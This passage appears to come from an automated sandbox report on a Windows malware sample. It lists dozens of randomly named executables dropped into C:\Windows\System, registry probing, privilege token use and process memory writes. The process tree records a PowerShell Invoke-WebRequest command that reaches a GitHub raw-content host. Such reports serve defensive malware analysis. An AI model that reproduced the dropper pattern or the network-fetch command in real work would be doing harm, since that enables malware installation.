File created C:\Windows\System\HXFMClk.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\rzqlbAc.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\xdrBGzP.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\ADoKXZW.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\byFPKjA.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\jkewCmt.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\grtMGgz.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\uAVzINf.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\FOJEzyB.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\SMGAIGL.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\BgyisNT.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\nlSuGrL.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\PqsTPCo.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\MUqetpb.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\arkRkDF.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\JsnPxgY.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\BngvfLl.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\bTdUPvW.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\KOyIFeY.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\keftAHC.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\IQuNGnG.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\ziNWURJ.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\HykuXsb.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\grAwBzR.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\imihAQy.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\Chjclez.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\tnCcUkD.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\xFWJVxM.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\eRHlrML.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\EqOZvbP.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\JrKvDEI.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\aKvyJyH.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\boVGoSP.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\vuCJSxw.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\xBYZYJD.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\MqNXyxT.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\emKhRgd.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\caotDLE.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\rJMwxlz.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\zihFbUF.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\QzNEzHS.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\HiIoXmR.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\ExternalFeatureOverrides\officeclicktorun C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\TrustCenter\Experimentation C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\officeclicktorun C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentEcs\all\Overrides C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 50,1329 10,1329 15,1329 100,1329 6" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentEcs\Overrides C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentEcs\officeclicktorun\Overrides C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages\en-US = "1" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages\en-US = "2" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1168 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1168 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1168 wrote to memory of 3396 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\qZzUIXb.exe
PID 1168 wrote to memory of 3396 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\qZzUIXb.exe
PID 1168 wrote to memory of 5088 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\CLGaUgU.exe
PID 1168 wrote to memory of 5088 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\CLGaUgU.exe
PID 1168 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\tlgMtuF.exe
PID 1168 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\tlgMtuF.exe
PID 1168 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\JhQWmZm.exe
PID 1168 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\JhQWmZm.exe
PID 1168 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\EAdLWJi.exe
PID 1168 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\EAdLWJi.exe
PID 1168 wrote to memory of 1504 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\NIVvdQi.exe
PID 1168 wrote to memory of 1504 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\NIVvdQi.exe
PID 1168 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\vgMmQOg.exe
PID 1168 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\vgMmQOg.exe
PID 1168 wrote to memory of 820 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\hPrNWiK.exe
PID 1168 wrote to memory of 820 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\hPrNWiK.exe
PID 1168 wrote to memory of 3920 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\tBWjaiB.exe
PID 1168 wrote to memory of 3920 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\tBWjaiB.exe
PID 1168 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\KvLJruv.exe
PID 1168 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\KvLJruv.exe
PID 1168 wrote to memory of 3656 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\UrQZfNg.exe
PID 1168 wrote to memory of 3656 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\UrQZfNg.exe
PID 1168 wrote to memory of 2024 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\ykwfmKT.exe
PID 1168 wrote to memory of 2024 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\ykwfmKT.exe
PID 1168 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\dtzoVTf.exe
PID 1168 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\dtzoVTf.exe
PID 1168 wrote to memory of 4240 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\bbxCNhx.exe
PID 1168 wrote to memory of 4240 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\bbxCNhx.exe
PID 1168 wrote to memory of 4228 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\fiucjns.exe
PID 1168 wrote to memory of 4228 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\fiucjns.exe
PID 1168 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\uYnVAlZ.exe
PID 1168 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\uYnVAlZ.exe
PID 1168 wrote to memory of 3452 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\RiphVXj.exe
PID 1168 wrote to memory of 3452 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\RiphVXj.exe
PID 1168 wrote to memory of 4112 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\OUSSupJ.exe
PID 1168 wrote to memory of 4112 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\OUSSupJ.exe
PID 1168 wrote to memory of 3652 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\GttnjHZ.exe
PID 1168 wrote to memory of 3652 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\GttnjHZ.exe
PID 1168 wrote to memory of 4012 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\NLQsayu.exe
PID 1168 wrote to memory of 4012 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\NLQsayu.exe
PID 1168 wrote to memory of 1572 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\zmwDvbJ.exe
PID 1168 wrote to memory of 1572 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\zmwDvbJ.exe
PID 1168 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\YnuDTWR.exe
PID 1168 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\YnuDTWR.exe
PID 1168 wrote to memory of 1188 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\tyaBnEP.exe
PID 1168 wrote to memory of 1188 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\tyaBnEP.exe
PID 1168 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\ayvBFmb.exe
PID 1168 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\ayvBFmb.exe
PID 1168 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\eDnfZcH.exe
PID 1168 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\eDnfZcH.exe
PID 1168 wrote to memory of 4128 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\ErEKwag.exe
PID 1168 wrote to memory of 4128 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\ErEKwag.exe
PID 1168 wrote to memory of 1120 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\YnvvLfp.exe
PID 1168 wrote to memory of 1120 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\YnvvLfp.exe
PID 1168 wrote to memory of 4124 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\noiElLe.exe
PID 1168 wrote to memory of 4124 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\noiElLe.exe
PID 1168 wrote to memory of 4556 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\XOWugEG.exe
PID 1168 wrote to memory of 4556 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\XOWugEG.exe
PID 1168 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\tMkYClM.exe
PID 1168 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\tMkYClM.exe
PID 1168 wrote to memory of 400 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\skatMhL.exe
PID 1168 wrote to memory of 400 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\skatMhL.exe

Processes

C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\qZzUIXb.exe

C:\Windows\System\qZzUIXb.exe

C:\Windows\System\CLGaUgU.exe

C:\Windows\System\CLGaUgU.exe

C:\Windows\System\tlgMtuF.exe

C:\Windows\System\tlgMtuF.exe

C:\Windows\System\JhQWmZm.exe

C:\Windows\System\JhQWmZm.exe

C:\Windows\System\EAdLWJi.exe

C:\Windows\System\EAdLWJi.exe

C:\Windows\System\NIVvdQi.exe

C:\Windows\System\NIVvdQi.exe

C:\Windows\System\vgMmQOg.exe

C:\Windows\System\vgMmQOg.exe

C:\Windows\System\hPrNWiK.exe

C:\Windows\System\hPrNWiK.exe

C:\Windows\System\tBWjaiB.exe

C:\Windows\System\tBWjaiB.exe

C:\Windows\System\KvLJruv.exe

C:\Windows\System\KvLJruv.exe

C:\Windows\System\UrQZfNg.exe

C:\Windows\System\UrQZfNg.exe

C:\Windows\System\ykwfmKT.exe

C:\Windows\System\ykwfmKT.exe

C:\Windows\System\dtzoVTf.exe

C:\Windows\System\dtzoVTf.exe

C:\Windows\System\bbxCNhx.exe

C:\Windows\System\bbxCNhx.exe

C:\Windows\System\fiucjns.exe

C:\Windows\System\fiucjns.exe

C:\Windows\System\uYnVAlZ.exe

C:\Windows\System\uYnVAlZ.exe

C:\Windows\System\RiphVXj.exe

C:\Windows\System\RiphVXj.exe

C:\Windows\System\OUSSupJ.exe

C:\Windows\System\OUSSupJ.exe

C:\Windows\System\GttnjHZ.exe

C:\Windows\System\GttnjHZ.exe

C:\Windows\System\NLQsayu.exe

C:\Windows\System\NLQsayu.exe

C:\Windows\System\zmwDvbJ.exe

C:\Windows\System\zmwDvbJ.exe

C:\Windows\System\YnuDTWR.exe

C:\Windows\System\YnuDTWR.exe

C:\Windows\System\tyaBnEP.exe

C:\Windows\System\tyaBnEP.exe

C:\Windows\System\ayvBFmb.exe

C:\Windows\System\ayvBFmb.exe

C:\Windows\System\eDnfZcH.exe

C:\Windows\System\eDnfZcH.exe

C:\Windows\System\ErEKwag.exe

C:\Windows\System\ErEKwag.exe

C:\Windows\System\YnvvLfp.exe

C:\Windows\System\YnvvLfp.exe

C:\Windows\System\noiElLe.exe

C:\Windows\System\noiElLe.exe

C:\Windows\System\XOWugEG.exe

C:\Windows\System\XOWugEG.exe

C:\Windows\System\tMkYClM.exe

C:\Windows\System\tMkYClM.exe

C:\Windows\System\skatMhL.exe

